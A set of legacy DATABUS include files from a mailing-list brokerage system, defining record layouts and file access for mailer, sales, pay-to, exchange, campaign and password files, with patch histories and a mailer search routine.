fuloct22 form 2
fuloct23 form 2
fuloct24 form 2
fuloct25 form 2
fuloct26 form 2
fuloct27 FORM 2
fuloct28 FORM 2
.
ovrnum form 2 table index
fulnum form 2 table index
fulnum1 form 2 table index
.
Fulcnt1 init " " contact at Fide.
Fulcnt2 init " " contact at Jetson.
Fulcnt3 init " " contact at Anacapa.
Fulcnt4 init "<NAME>" contact at Antares.
Fulcnt5 init " " contact at Small pub.
Fulcnt6 init "Mark" contact at DTM.
Fulcnt7 init " " contact at PIDI.
Fulcnt8 init " " contact at Epsilon.
Fulcnt9 init " " contact at List Maintenance.
Fulcnt10 init "Jan" contact at KABLE Progressive
.Fulcnt10 init "Marci" contact at KABLE/Pub Aid. Progressive
Fulcnt10a init "Jan" contact at KABLE/Pub Aid. E Mag
Fulcnt11 init " " contact at FIDE.
Fulcnt12 init " " contact at NATL SUBSC.FUL.
.Fulcnt13 init "<NAME>" contact at METRO SVC/LAURE.
Fulcnt13 init "<NAME>" contact at METRO SVC/Citizen Soldier.
Fulcnt14 init " " contact at NATL CONVSN SYS.
Fulcnt15 init " " contact at Dynamark.
Fulcnt16 init " " contact at IMI/INFO.MGT.
Fulcnt17 init " " contact at PACIF.COAST DIR.
Fulcnt18 init " " contact at INTERACTIVE SYS.
Fulcnt19 init "Charmaine" contact at DRCT ACCESS MKTG.
Fulcnt20 init "<NAME>" contact at METRO DIRECT/Am Friends Srv
Fulcnt21 init "<NAME>" contact at L & E MERIDIAN
Fulcnt22 init "Richie/Rod" contact at ARG/RICHIE G.
Fulcnt23 init "Catherine" contact at FFA/CATHERINE
Fulcnt24 init " " contact at BLAEMIRE COMM.
Fulcnt25 init "<NAME>." contact at ANNA M.\ATC.
Fulcnt26 init " " contact at TDMC
Fulcnt27 INIT " " contact at MSGI/METRO DIRECT Earthwatch
Fulcnt28 INIT " " contact at ENERTEX Mktg
..........................................................................................
<file_sep>/include/Nxrfdd.inc
******************************************************************************
*VARIABLE INCLUSION FOR EXCHANGE LIST/MAILER REF FILE.
******************************************************************************
* FILE: LISTMLR
* RECORD SIZE: 12
* COMPRESS: NONE
* TYPE: ISAM
* KEY: 1 LIST NUMBER 1-6
* KEY: 2 MAILER NUMBER 7-12 - DUPLICATES ALLOWED
******************************************************************************
. Patch 1.1 ASH 15Mar2005 Mailer field conversion
.
NXRFFLst Filelist
.START PATCH 1.1 REPLACED LOGIC
.NXRFFILE IFILE KEYLEN=6,FIX=10,Name="LISTMLR"
.NXRFFIL2 IFILE KEYLEN=4,FIX=10,DUP,Name="LISTMLR1"
NXRFFILE IFILE KEYLEN=6,FIX=12,Name="LISTMLR.ISI|NINS1:502"
NXRFFIL2 IFILE KEYLEN=6,FIX=12,DUP,Name="LISTMLR1.ISI|NINS1:502"
.END PATCH 1.1 REPLACED LOGIC
Filelistend
.
NXRFFLAG FORM 1
NXRFFLG2 FORM 1
NXRFPATH FORM 1
NXRFNAME DIM 8
NXRFNAM1 INIT "LISTMLR "
NXRFNAM2 INIT "LISTMLR1 "
.
NXRFFLD DIM 6
NXRFFLD2 DIM 6
.
NXRFLIST DIM 6 1-6 LIST NUMBER KEY
NXRFMLR DIM 6 7-12 MAILER NUMBER
..............................................................................
<file_sep>/include/NSLSIO.INC
..............................................................................
.
. NSLSIO INCLUSION
.
. FILE NAME : NINSLS
. REC LENGTH: 163 SPACE
. INDEX KEY : 4
.
..............................................................................
.
. ENTRY POINT : NSLSSEQ
. REQUIRED :
. RETURNED : SALES RECORD
. DESCRIPTION : SEQUENTIAL SALES FILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
NSLSSEQ COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS4 IF EQUAL
CALL NSLSOPEN
NSLS4 FILEPI 1;NSLSFILE
READ NSLSFILE,SEQ;SLSvars 1-4 MAILER NUMBER.
RETURN
..............................................................................
.
. ENTRY POINT : NSLSWRT
. REQUIRED :
. RETURNED :
. DESCRIPTION : SEQ TXT WRITE
.
NSLSWRT BRANCH NSLSFLAG TO NSLS5
CALL NSLSOPEN
NSLS5 FILEPI 1;NSLSFILE
WRITE NSLSFILE,SEQ;SLsvars
RETURN
.
NSLSKEY COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS1 IF EQUAL
CALL NSLSOPEN
NSLS1 FILEPI 1;NSLSFLE2
READ NSLSFLE2,nslsfld;SLSvars
RETURN
..............................................................................
NSLSKS COMPARE NSLSPATH TO NSLSFLAG
GOTO NSLS3 IF EQUAL
CALL NSLSOPEN
NSLS3 FILEPI 1;NSLSFLE2
READKS NSLSFLE2;SLSvars
RETURN
..............................................................................
.
. ENTRY POINT : NSLSOPEN
. REQUIRED : 'NSLSFLAG'
. RETURNED : 'NSLSFLAG' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MAILER FILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
NSLSOPEN TRAP NSLSGONE IF IO
BRANCH NSLSPATH OF NSLSOPN1,NSLSOPN2
NSLSOPN1 OPEN NSLSFILE,NSLSNAME
TRAPCLR IO
MOVE C1 TO NSLSFLAG
RETURN
NSLSOPN2 OPEN NSLSFLE2,NSLSNAME
TRAPCLR IO
MOVE C2 TO NSLSFLAG
RETURN
.
NSLSGONE MOVE NSLSNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/MDC060DD.INC
.* MIN List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* MIN DATACARD FILES.
.* ****************************************************
.
. FILE: MDC_M060
. LENGTH: Variable
. COMPRESS: NONE
. TYPE: FLAT Comma Delimited
......................................................
. LAST MODIFIED
. patch 1.0 14 August 2006 DLH New
.Main file
.MDCMaindd
.Secondary FIles See
.MDCSEGDD - Segment info universe & $
.MDSMSCDD - Misc addressing Min, UOS,Gender,Media,net
.MDC060DD - CAtegory
.MDC091DD - Owner ???? data no supplied
.MDC060DD - Owner
.MDCTXTDD - Text
......................................................
M060NAME Init "MDC_060.isi|NINS1:502"
M060FILE IFILE Name="MDC_060.isi|NINS1:502"
M060SFILE FILE
.M060SFILE FILE Name="MDC_060.csv"
M060Fld Dim 3
M060FLAG FORM 1
M060PATH FORM 1
.
M060VARS LIST .for ease I am using Min's names
FC Dim 3 1-3 cat Code#
FDSC Dim 25 4-28 Desc
ListEnd
<file_sep>/include/nspe2dd.inc
..............................................................................
.
. NSPE2DD INCLUSION
.
. FILE NAME : NINSPEC2
. REC LENGTH: 1006
. INDEX KEY : 1-6
..............................................................................
.
NSPE2FILE IFILE KEYLEN=6,VAR=1006,COMP,NODUPLICATES
.NSPE2NAME INIT "NINSPEC2"
.NSPE2NAME INIT "NINSPEC2.ISI|20.20.30.103:502"
NSPE2NAME INIT "NINSPEC2.ISI|NINS1:502"
NSPE2FLD DIM 6
NSPE2FLAG FORM 1
nspe2lock form 1 0 or 1 - filepi, 2 =record locking, = no locks
..............................................................................
NSPE2VARS list
NSPE2LR dim 6 1-6 LR NUMBER
DESC003 DIM 500 7-506 INTERNAL NOTES
DESC004 DIM 500 507-1006 MAILER NOTES
listend
.
<file_sep>/include/NPASDD.INC
...............................................................................
.NPASDD - DATA DESCRIPTOR
.
.FILE: NINPASS
.
.SIZE: 68 VARIABLE,COMPRESSED
.
.INDEX: 1-6 ()
...............................................................................
NPASNAME INIT "NINPASS.dat|NINS1:502 "
NPASFLIST FILELIST
NPASFILE IFILE KEYLEN=6,Fixed=68,Name="NINPASS.isi|NINS1:502"
NPASFLE1 IFILE KEYLEN=1,Name="NINPASS1.isi|NINS1:502"
NPASFLE2 AFILE Fixed=68,Name="NINPASS.aam|NINS1:502"
FILELISTEND
.
NPASFLD DIM 6 KEY
NPASFLD1 DIM 1 KEY // for isi read // added 2/28/06 DMS
NPASFLD2 DIM 8 KEY // for aam read (5+3) // added 2/28/06 DMS
NPASFLAG FORM 1
NPASLOCK FORM 1 0 OR 1=File Locks, 2=Record Locks, 3=No Locks
.Vars used with Passwrd.plf .Added 03/19/99 by ASH
PROGCODE DIM 1
PASSFLAG DIM 1
.End of added vars
.
NPASLIST LIST
NPASKEY DIM 6 1-6 PASSWORD - KEY: "PROGCODE" + ACTUAL PASSWORD
NPASUSER DIM 10 7-16 USER ID
NPASFILL DIM 1 17-17 NOT USED.
NPASNAM1 DIM 22 18-39 FULL USER NAME.
NPASDESC DIM 21 40-60 DESCRIPTION OF PROGRAM ACCESS
NPASDATE DIM 8 61-68 DATE ENTERED/MODIFIED 'CCYYMMDD'
LISTEND
.
<file_sep>/include/nmoddd.inc
******************************************************
* NMODDD INCLUSION
* PRICE MODIFIER FILE FOR DATACARD SUBSIDIARY FILES
* PRICE MODIFIER FILE DESCRIPTOR.
. ....................................................
* ****************************************************
* NAMES IN THE NEWS MASTER PRICE MODIFIER FILE.
* ****************************************************
.
. FILE: NINMOD
. LENGTH: 43
. TYPE: AIM,ISAM,MANAGED
. INDEX KEY: 1-3 NMODNUM
.AIMDEX KEY: 4-23 NMODDESC
......................................................
NMODNAME INIT "NINMOD"
NMODFLIST FILELIST
.NMODFILE IFILE KEYLEN=9,FIXED=43,Name="NINMOD.isi"
.NMODFLE2 AFILE FIXED=43,Name="NINMOD.aam"
. dlh ??????????? NMODFILE IFILE KEYLEN=9,FIXED=43,Name="NINMOD.isi|NINS1:502"
NMODFILE IFILE KEYLEN=3,FIXED=43,Name="NINMOD.isi|NINS1:502"
NMODFLE2 AFILE FIXED=43,Name="NINMOD.aam|NINS1:502"
FILELISTEND
.
NMODLOCK FORM 1 0 OR 1=filepi,2=recordlock, 3=no lock
NMODFLD DIM 3
NMODFLD1 DIM 23
NMODFLAG FORM 1
NMODPATH FORM 1
.
NMODVARS LIST
NMODNUM DIM 3 1-3 PRICE MODIFIER NUMBER
NMODDESC DIM 20 4-23 PRICE MODIFIER DESCRIPTION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /M
. "002" /FLAT
. "003" /EACH
. "004" /MIN
. "005" N/A
. "006" N/C
. "007" SEEBASE
. "008" SEEDESC
. "009" INQUIRE
NMODCALC DIM 20 24-43 PRICE MODIFIER CALCULATION
. " " OR "000" NO DESCRIPTION/CALCULATION
. "001" /1000
. "002"
. "003" *1
. "004"
. "005"
. "006" *0
. "007"
. "008"
. "009"
LISTEND
<file_sep>/include/npaydd.inc
..............................................................................
.
. NPAYDD INCLUSION
. NIN PAY-TO FILE DEFINITION
.
. FILE NAME : NINPAY
. REC LENGTH: 227 FIXED
. INDEX KEY : 2-6 (POWNER,PAYNUM)
. AIM KEY : 7-96
. added tele & fax 16may95.????
.
. ASH 31AUG98 CREATED TWO NEW FIELDS: P2STREET,PCOUN
. Record length changed to 227 fixed
. Patch: Increased length of PNAME and PCOMP to 45 each
. Record length changed to 187 FIXED
. Patch Author: <NAME>
. Patch Date: July 9,1998
.
. Patch #100 - Created as test for Year 2000 conversion
. Record length changed to 147 FIXED
. This takes into consideration two new fields
. added on 16may95 (see above), as well as
. new date format
. Patch Author: <NAME>
. Patch Date: May 21,1998
..............................................................................
.
.NPAYFILE IFILE KEYLEN=5,FIXED=125
.NPAYFILE IFILE KEYLEN=5,FIXED=147
.NPAYFILE IFILE KEYLEN=5,FIXED=187
.NPAYFIL AFILE 50,1,,FIXED=125
.NPAYFIL2 AFILE FIXED=125
.NPAYFIL2 AFILE FIXED=147
.NPAYFIL2 AFILE FIXED=187
.NPAYFLE3 FILE FIXED=125
.NPAYFLE3 FILE FIXED=147
.NPAYFLE3 FILE FIXED=187
PayFList Filelist
NPAYFILE IFILE KEYLEN=5,FIXED=227,Name="NINPAY.isi|NINS1:502"
NPAYFIL2 AFILE FIXED=227,Name="NINPAY.AAM|NINS1:502"
FileListEnd
NPAYFLE3 FILE FIXED=227
NPAYNAME INIT "NINPAY "
NPAYFLD DIM 5
.NPAYFLD2 DIM 53
NPAYFLD2 DIM 93
NPAYPATH FORM 1
NPAYFLAG FORM 1
NPAYFLG2 FORM 1
NPAYFLG3 FORM 1
NPAYLOCK FORM 1 0 or 1=File locks, 2=Record locks, 3=no locks
.
.Defined PAYNUM codes:
. 0= automatically applied substitute for list owner info.
. 1= Consumer Direct
. 2= List Processing Service
. 3= Epsilon
. 4= CMS
. 5= not assigned
. 6= not assigned
. 7= Lifestyle Selector
. 8= misc fulfilment Corp's.
. 9= Generally used to override a default 0 entry. and
. force it to revert to owner file info.
...............................................................................
payvars list
PAYRCODE DIM 1 1-1 RECORD CODE = '6'
POWNER DIM 4 2-5 OWNER NUMBER
PAYNUM DIM 1 6-6 PAY-TO NUMBER FOR MULT PAY-TO'S
PNAME DIM 45 7-51 CONTACT NAME
PCOMP DIM 45 52-96 COMPANY NAME
PSTREET DIM 25 97-121 STREET ADDRESS
P2STREET DIM 25 122-146 STREET ADDRESS2
PCITY DIM 15 147-161 CITY
PSTATE DIM 2 162-163 STATE
PZIP DIM 10 164-173 ZIPCODE
PCOUN DIM 15 174-188 COUNTRY CODE
PPASS DIM 10 189-198 PASSWORD ID
PDATE DIM 8 199-206 REVISED DATE
PBLANK DIM 1 207-207 NOT USED.
payTELE DIM 10 208-217 TELEPHONE NUMBER
payFAX DIM 10 128-227 FAX NUMBER.
listend
.PNAME DIM 25 7-51 CONTACT NAME
.PCOMP DIM 25 52-96 COMPANY NAME
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
.CHECKWRITER DATABUS
.FIXINV DATABUS
.MODINV DATABUS
.NINP29 DATABUS
.NINP29EDIT DATABUS
.ERPAYLET DATABUS
.PAYMOD DATABUS
LISTON
<file_sep>/include/nxchdd.inc
* NXCHDD/INC.
* *****************************************************************************
* NAMES IN THE NEWS MASTER EXCHANGE ACCOUNT DETAIL FILE.
* *****************************************************************************
.
. FILE: NINXCHNG, NINLRXNG
. LENGTH: 200
.COMPRESS: NONE
. TYPE: ISAM/AAM
. KEY: EXKEY,LR
.
. DLH 08 Feb 2010 nxchlock
. ASH 05APR2005 Complete rewrite - File Conversion
...............................................................................
NXCHNAME INIT "NINXCHNG|NINS1:502 "
.
NXCHFLIST FILELIST
NXCHFILE IFILE KEYLEN=17,FIXED=200,Name="NINXCHNG.isi|NINS1:502"
NXCHFLE2 IFILE KEYLEN=6,FIXED=200,Name="NINLRXNG.isi|NINS1:502"
NXCHFLE3 AFILE FIXED=200,Name="NINXCHNG.aam|NINS1:502"
.
FILELISTEND
.
NXCHFLD1 DIM 17
NXCHFLD2 DIM 6
NXCHFLD3 DIM 9 .AamDex Mlr 1
NXCHFLD4 DIM 9 .AamDex Mlr 2
NXCHPATH FORM 1 .1=mlr,mlr,entry;2=lr
NXCHFLAG FORM 1
NXCHLock FORM 1 0/1 filepi, 2 record locks, 3 no locks
.
nxchvars list
EXKEY DIM 17 1-17 MLR1,MLR2,ENTRY
LR2 DIM 3 18-20
LR DIM 6 21-26 LR #
USAGE1 FORM 10 27-36 MAILER1 USAGE
USAGE2 FORM 10 37-46 MAILER2 USAGE
QTYfill FORM 3 47-49 ORDER QTY expansion
QTY FORM 9 50-58 ORDER QTY
LIST DIM 6 59-64 LIST #
DAT DIM 8 65-72 Order DATE CCYYMMDD
STAT DIM 1 73-73 exchange STATUS
. 'C' =CANCELLED ADJUSTED, 'R'=RENTAL,
. 'X'=CANCELLED NOT ADJUSTED.
MLRSW DIM 1 74-74 1 IF MLR1, 2 IF MLR2
TYPE DIM 2 75-76 TYPIST INITALS
XCHCOMNT DIM 100 77-176 KEYED IN COMMENTS
.begin patch 11 Feb 09
Date1 Dim 8 177-184 .order date or date of manual entry
DateM Dim 8 185-192 .Mail date of manual entry
.xchfiller dim 24 177-200
xchfiller dim 8 193-200
.end patch 11 Feb 09
listend<file_sep>/include/NWFDD.INC
..............................................................................
.
. NWFDD INCLUSION
. NWF Stats FILE DEFINITION
.
. FILE NAME : NWFSTATs
. REC LENGTH: 478 FIXED
. INDEX KEY :
..............................................................................
.
NWFFILE IFILE KEYLEN=50,FIXED=478,UNCOMP
NWFFLE2 IFILE KEYLEN=6,FIXED=478,UNCOMP
NWFNAME INIT "NWFSTATS"
NWFNME2 INIT "NWFSTAT1"
NWFFLD dim 50
nwffld2 dim 6
NWFFLAG FORM 1
NWFFLAg2 FORM 1
nwfpath form 1
.
NWFvars list
nwfcampn dim 30 1-30 Campaign
nwfmdate dim 8 31-38 mm,dd,cc,yy maildate
nwfudate dim 8 39-46 Last update of stats
nwfwkso form 6 47-52 weeks out
nwfpdate dim 8 53-60 mail processed thru
nwfpanel dim 60 61-120
nwfsrce dim 6 121-126
nwflist dim 30 127-156
nwfsel dim 30 157-186
ninlist dim 6 187-192
nwftype dim 1 193-193 list type Continuation or Test
nwfmqty form 8 194-201
nwfresp form 7 202-208
nwfrr form 1.6 209-216
nwf96z form 1.2 217-220 .nwf only?
nwfP form 1.6 221-228 .nwf only?
nwfsqrtP form 1.6 229-236 .nwf only?
nwfpci form 1.6 237-244
nwfnci form 1.6 245-252
nwfrev form 9 253-261 gross revenue
nwfavgft form 2.2 262-266
nwflstcpm form 4.2 267-273 list cost per m
nwftlst$ form 5.2 274-281
nwfpckcpm form 3.2 282-287
nwfTpck form 5.2 288-295 total package cost
NWFTCPM FORM 3.2 296-301 total cost per M
Nwftmcst form 6.2 302-310 total mail cost
nwfupcst form 4.2 311-317 unit premium cost
nwftpcst form 5.2 318-325 total premium cost
nwftotcst form 6.2 326-334 total cost
nwfnetrev form 6.2 335-343
nwfnrpci form 6.2 344-352
nwfnrnci form 6.2 353-361
nwfCstA form 4.2 362-368 cost to aquire
nwfpcaci form 4.2 369-375
nwfncaci form 4.2 376-382
nwfCTA form 4.2 383-389
nwfcost$ form 3.2 390-395
nwfnqty form 7 396-402
nwfinv form 5.2 403-410
nwflcpm form 3.2 411-416
nwfkeycd dim 6 417-422
nwfasresp form 7 423-429 Associate responses
nwfasrev form 9 430-438 " revenue
nwfasrr form 1.6 439-446 " response rate
nwfbasresp form 7 447-453 Basic reponses
nwfbasrev form 9 454-462 " revenue
nwfbasrr form 1.6 463-470 " response rate
nwfCI form 1.6 471-478
listend
.END OF INCLUDE
.
..............................................................................
<file_sep>/include/NSCHDD.INC
..............................................................................
.
. NSCHDD INCLUSION
. NIN BOOKING SCHEDULE FILE DEFINITION
.
. FILE NAME : MAILDATE
. REC LENGTH: 26 FIXED
. AIM KEY : 1-6 (6 POSITION LIST#)
. : 7-8 YEAR
. : 9-10 MONTH
..............................................................................
IFNZ PC
NSCHFILE AFILE FIX=26
XIF
IFZ PC
.NSCHFILE AFILE 19,3,,,FIX=26
NSCHFILE AFILE FIX=26
XIF
.
NSCHFLAG FORM 1
NSCHNAME INIT "MAILDATE"
NSCHFLD DIM 9 LIST
NSCHFLD2 DIM 5 YEAR
NSCHFLD3 DIM 5 MONTH
.
. NSCHFILE FILE RECORD SIZE 26 FIXED
. .............
.
SCHKEY DIM 6 1-6 LIST NUMBER
SCHYEAR DIM 2 7-8 YEAR SCEDULED (ASSUMED TO BE CURRENT YEAR IF
. NOT SPECIFIED).
SCHMONTH DIM 2 9-10 MONTH SCEDULED
SCHDAY DIM 2 11-12 DAY SCEDULED (ALWAYS A MONDAY).
SCHMLR DIM 7 13-19 MAILER DESC KEYED IN
SCHQUANT DIM 7 20-26 QUANTITY SCHEDULED KEYED IN.
.
<file_sep>/include/ncmpdd104.inc
...................................................
.
. NCMPDD INCLUSION
. NIN supplimental (Campaign) ORDER FILE DEFINITION
. one record per campaign
. FILE NAME : NINCMP.DAT
. REC LENGTH: 535 FIXED
. INDEX KEY : (1) 001-006 (Campaign Number)
.
. AAM KEYS : (1) 007-051 (Campaign Name)
. (2) 052-057 (Mailer Number)
. (3) 058-066 (Broker Number/Cnt)
. (4) 067-078 (P.O. Number)
. (5) 079-079 (Campaign Status)
.
. Patch 1.2 DMB 06/18/2005 Changed IP of File Manager
. Patch 1.1 ASH 11/23/2004 Increased Mailer/Broker and converted to Company Number
. Increased Ship-to to prep for future conversion
.
NCMPNAME DIM 8
NCMPNME1 INIT "NINCMP"
.START PATCH 1.1 REPLACED LOGIC
.NCMPFILE IFILE KEYLEN=6,FIXED=535
.NCMPFLE2 AFILE FIXED=535
.NCMPNME2 INIT "NINCMP"
.>Patch 1.2 Begin
NCMPFLIST FileList
.NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI"
.NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM"
.NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI|20.20.30.104:502"
NCMPFILE IFILE KEYLEN=6,FIXED=535,uncomp,Name="NINCMP.ISI|10.10.30.104:502"
.NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM|20.20.30.104:502"
NCMPFLE2 AFILE FIXED=535,uncomp,Name="NINCMP.AAM|10.10.30.104:502"
FileListEnd
.>Patch 1.2 End
.END PATCH 1.1 REPLACED LOGIC
NCMPFLD DIM 6 Campaign Number(ISAM)
NCMPFLD1 DIM 48 Campaign Name(AAM)
.START PATCH 1.1 REPLACED LOGIC
.NCMPFLD2 DIM 7 Mailer Number(AAM)
.NCMPFLD3 DIM 10 Broker Number/Cnt(AAM)
NCMPFLD2 DIM 9 Mailer Number(AAM)
NCMPFLD3 DIM 12 Broker Number/Cnt(AAM)
.END PATCH 1.1 REPLACED LOGIC
NCMPFLD4 DIM 15 P.O. Number(AAM)
NCMPFLD5 DIM 5 Contact(AAM)
NCMPFLAG FORM 1
.START PATCH 1.1 REMOVED LOGIC
.NCMPFLG2 FORM 1
.END PATCH 1.1 REMOVED LOGIC
NCMPPATH FORM 1
NCMPLOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NCMPVARS LIST
NCMPNum DIM 6 001-006 Campaign Number(Key)
NCMPCName DIM 45 007-051 Campaign Name(AAMKey)
.START PATCH 1.1 REPLACED LOGIC
.NCMPMlr DIM 4 052-055 Mailer Number(AAMKey)
.NCMPBrk DIM 4 056-059 Broker Number(AAMKey)
NCMPMlr DIM 6 052-057 Mailer Number(AAMKey)
NCMPBrk DIM 6 058-063 Broker Number(AAMKey)
.END PATCH 1.1 REPLACED LOGIC
NCMPBrkCnt DIM 3 064-066 Broker Contact(AAMKey)
NCMPPO DIM 12 067-078 P.O. Number(AAMKey)
NCMPStat DIM 1 079-079 Campaign Status
.START PATCH 1.1 REPLACED LOGIC
.NCMPShipTo DIM 4 080-083 Ship To Number
NCMPShipTo DIM 6 080-085 Ship To Number
.END PATCH 1.1 REPLACED LOGIC
NCMPDate DIM 8 086-093 Campaign Date
NCMPModDate DIM 8 094-101 Modification Date
NCMPInits DIM 3 102-104 Modification Initials
NCMPCnt DIM 2 105-106 Contact(AAMKey)
NCMPPlanner DIM 2 107-108 Planner
NCMPQty DIM 13 109-121 Gross Campaign Qty
NCMPNetQty DIM 13 122-134 Net Campaign Qty
NCMPRate DIM 6 135-140 Response Rate Change%
NCMPGift DIM 6 141-146 Gift Change%
.----------MASTER FIELDS-----------
NCMPOffer DIM 3 147-149 Master Offer
NCMPMedia DIM 2 150-151 Master Media
NCMPSample DIM 3 152-154 Master Sample
NCMPShip DIM 2 155-156 Master Shipping Method
NCMPKey DIM 12 157-168 Master Key Info
NCMPMDate DIM 8 169-176 Master Mail Date
NCMPRDate DIM 8 177-184 Master Return Date
NCMPCDate DIM 8 185-192 Master Cut-off Date
.
NCMPComment DIM 300 193-492 Special Instructions
NCMPCode DIM 1 493-493 Busy Byte
NCMPBill DIM 1 494-494 Bill Direct Code
NCMPRpt DIM 1 495-495 Projection Report Default
.START PATCH 1.1 REPLACED LOGIC
.NCMPFiller DIM 46 490-535 Filler
NCMPFiller DIM 40 496-535 Filler
.END PATCH 1.1 REPLACED LOGIC
listend
<file_sep>/include/Mlrhelp.inc
; Last change: ML 21 Oct 1998 2:53 pm
.............................................................................
.MLRHELP - AIM SEARCH FOR MAILER.
.
.ENTER WITH - TOPWIND,BOTWIN,LWIND,RWIND - TO DEFINE WINDOW.
.EXIT WITH - MNUM, MCOMP, NEED TO MOVE TO OTHER VARIABLES AND RETURN AT .
. EXIT PARAGRAPH.
.
. 19oct98 change chkkey to chkkeym, changed ntenof to ntenofM
. to avoide dupe paragraph names
. REVISED TO HANDLE SMALLER WINDOW & USE NMLRIO.INC - JAN/FEB 92 DLH.
.............................................................................
MLRHELP CLEAR STR2
MOVE TOPWIND TO STR2
TYPE STR2 *VALID NUMBER?
CALL MSETWIN IF NOT EQUAL
CALL MSETWIN IF EOS
COMPARE C0 TO TOPWIND
CALL MSETWIN IF NOT GREATER
DISPLAY *SETSWALL TOPWIND:BOTWIND:LWIND:RWIND;
move yes to str1
KEYIN *P1:1,*ES:
*P1:6,*EL,"I WILL HELP YOU FIND THE MAILER NUMBER",*R:
*P1:6,*EL,"THAT YOU WANT":
*R,*P1:6:
*R,*P1:6,"DO YOU WANT A FREE FLOAT SEARCH ? ,":
*R,*P1:6,"ie: FIND 'AMERICAN' ANYWHERE IN MAILER ":
*R,*P1:6,"NAME ",*T60,*RV,*UC,STR1;
CMATCH YES TO STR1
GOTO FREFLOAT IF EQUAL
MOVE "01L" TO str3
KEYMLR KEYIN *P1:1,*ES,"TYPE IN MAILER NAME : ":
*P1:2,*DV,MCOMP:
*P1:2,*T60,*EDIT,MCOMP
MOVE MCOMP TO STR24
CMATCH "*" IN MCOMP
GOTO MLRAEXT1 IF EQUAL
KEYIN *P1:2,*DV,MCOMP,*P1:3,"OK ? ",*T60,*uc,STR1:
*P1:3,*EL;
CMATCH NO TO STR1
GOTO KEYMLR IF EQUAL
CMATCH B1 TO MCOMP
GOTO ntenofM IF EQUAL
GOTO ntenofM IF EOS
MATCH "01L" TO str3
GOTO PACKM1 IF EQUAL
PACK MLRAKEY FROM str3,MCOMP
CALL CHKKEYM
GOTO MLREADA
PACKM1 PACK MLRAKEY FROM str3,MCOMP,Question,Question,Question
CALL CHKKEYM
GOTO MLREADA
FREFLOAT MOVE "01F" TO str3
GOTO KEYMLR
MLREADA
CLEAR MNUM
MOVE "*****NO MNUM FOUND*****" TO MCOMP
CALL NMLRAIM
IF OVER
MOVE STR24 TO MCOMP
GOTO MLRAEXIT
ENDIF
MOVE MNUM TO STR4
GOTO DISMLRA
CHKKEYM MOVELPTR MLRAKEY TO n2
GOTO ntenofM IF ZERO
COMPARE C6 TO n2
GOTO ntenofM IF LESS *NOT ENOUGH INFO, LET THEM KNOW
RETURN *OK, RETURN
MLREADA1 CLEAR MNUM
MOVE "*****NO MNUM FOUND*****" TO MCOMP
CALL NMLRKG
IF OVER
MOVE STR24 TO MCOMP
move b1 to mfax
GOTO MLRAEXIT
ENDIF
MATCH MNUM TO STR4
GOTO MLREADA1 IF EQUAL
MOVE MNUM TO STR4
GOTO DISMLRA
MLREADA2 CLEAR MNUM
MOVE "*****NO MNUM FOUND*****" TO MCOMP
IFZ PC
CALL NMLRKGP
XIF
IF OVER
MOVE STR24 TO MCOMP
GOTO MLRAEXIT
ENDIF
MATCH MNUM TO STR4
GOTO MLREADA2 IF EQUAL
MOVE MNUM TO STR4
GOTO DISMLRA
DISMLRA DISPLAY *P1:11,*EL,"##",MNUM," ",MCOMP;
ENDSET MCOMP
IFZ PC
KEYIN *P1:6,"ENTER TO CONTINUE, (P)rior (*) TO END",*T254,*uc,STR1;
XIF
IFNZ PC
KEYIN *P1:6,"ENTER TO CONTINUE (*) TO END",*T254,*uc,STR1;
XIF
CMATCH STAR TO STR1
GOTO MLRAEXT1 IF EQUAL
CMATCH "P" TO STR1
GOTO MLREADA2 IF EQUAL
GOTO MLREADA1
.............................................................................
ntenofM DISPLAY *P1:24,*BLINKON,*HON,*EL,"NOT ENOUGH INFO TO SEARCH",*w,*b:
*HOFF;
GOTO MLRHELP
.............................................................................
MLRAEXIT
clear mnum
MOVE YES TO OVER
MLRAEXT1 DISPLAY *P1:1,*ES,*RESETSW:
*P20:24,*HON,"ENTER (*) TO EXIT, (<) TO BACKUP":
" or (?) FOR HELP",*HOFF;
. MOVE STR24 TO MCOMP
RETURN
................
MSETWIN MOVE "18" TO TOPWIND NO VALUES GIVEN,SET TO DEFAULTS
MOVE C24 TO BOTWIND
MOVE "40" TO LWIND
MOVE C80 TO RWIND
RETURN
............................................................................
<file_sep>/include/nloldd.inc
...................................................
.
. NLOLDD INCLUSION
. NIN supplimental (List of List) ORDER FILE DEFINITION
.
. FILE NAME : NINLOL.DAT
. REC LENGTH: 516 FIXED
. INDEX KEY : (1) 003-008 (LOL Number- Hidden value!!!)
. (2) 009-014 (Campaign Number)
.
. AAM KEYS : (1) 009-020 (Campaign Number + List Number)
. (2) 021-026 (LR/LCR Number)
. (3)
. (4)
. (5)
.
.; PATCH 1.1 DMB 18JUN2005 Changed IP of File Manager
NLOLNAME DIM 28
.>Patch 1.1 Begin
.NLOLNME INIT "NINLOL.ISI|20.20.30.103:502 "
NLOLNME INIT "NINLOL.ISI|NINS1:502 "
.NLOLNME1 INIT "NINLOL1.ISI|20.20.30.103:502"
NLOLNME1 INIT "NINLOL1.ISI|NINS1:502"
.NLOLNME2 INIT "NINLOL.AAM|20.20.30.103:502"
NLOLNME2 INIT "NINLOL.AAM|NINS1:502"
.>Patch 1.1 End
.NLOLNME INIT "NINLOL.ISI "
.NLOLNME1 INIT "NINLOL1.ISI"
.NLOLNME2 INIT "NINLOL.AAM "
NLOLFILE IFILE KEYLEN=6,FIXED=516
NLOLFLE1 IFILE KEYLEN=6,FIXED=516
NLOLFLE2 AFILE FIXED=516
NLOLFLD DIM 6 LOL Number(ISAM) Hidden value!!!
NLOLFLD1 DIM 6 Campaign Number(ISAM)
NLOLFLD2 DIM 15 Campaign Number + List Number(AAM)
